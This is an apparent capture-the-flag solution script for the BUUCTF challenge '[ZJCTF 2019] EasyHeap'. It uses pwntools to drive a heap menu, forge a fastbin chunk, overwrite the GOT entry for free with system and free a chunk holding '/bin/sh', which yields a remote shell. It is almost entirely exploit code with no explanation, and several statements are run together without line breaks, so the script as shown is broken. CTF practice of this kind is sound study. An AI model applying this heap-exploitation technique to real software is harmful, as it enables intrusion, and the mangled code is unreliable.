[BUUCTF-pwn]——[ZJCTF 2019]EasyHeap




from pwn import *context(os='linux',arch='amd64',log_level='debug')p = remote("node4.buuoj.cn",28081)
elf = ELF('easyheap')
p.sendafter('Your choice :',b'1\n')
p.sendafter('Size of Heap : ',b'96\n')
p.sendafter('Content of heap:',b'\n')p.sendafter('Your choice :',b'1\n')
p.sendafter('Size of Heap : ',b'96\n')
p.sendafter('Content of heap:',b'\n')p.sendafter('Your choice :',b'3\n')   # free 1
p.sendafter('Index :','1\n')payload = p64(0x0) * 13 + p64(0x71)  + p64(0x6020ad) + p64(0x0)
p.sendafter('Your choice :',b'2\n')
p.sendafter('Index :',b'0\n')
p.sendafter('Size of Heap : ',b'1000\n')
p.sendafter('Content of heap : ',payload)p.sendafter('Your choice :',b'1\n')
p.sendafter('Size of Heap : ',b'96\n')
p.sendafter('Content of heap:',b'\n')p.sendafter('Your choice :',b'1\n')
p.sendafter('Size of Heap : ',b'96\n')
p.sendafter('Content of heap:',b'\n')payload = b'a' * 35 + p64(elf.got['free'])
p.sendafter('Your choice :',b'2\n')
p.sendafter('Index :',b'2\n')
p.sendafter('Size of Heap : ',b'1000\n')
p.sendafter('Content of heap : ',payload)sys_addr = 0x400700
p.sendafter('Your choice :',b'2\n')
p.sendafter('Index :',b'0\n')
p.sendafter('Size of Heap : ',b'1000\n')
p.sendafter('Content of heap : ',p64(sys_addr))binsh = '/bin/sh\x00'
p.sendafter('Your choice :',b'2\n')
p.sendafter('Index :',b'1\n')
p.sendafter('Size of Heap : ',b'1000\n')
p.sendafter('Content of heap : ',binsh)p.sendafter('Your choice :',b'3\n')
p.sendafter('Index :',b'1\n')p.interactive()

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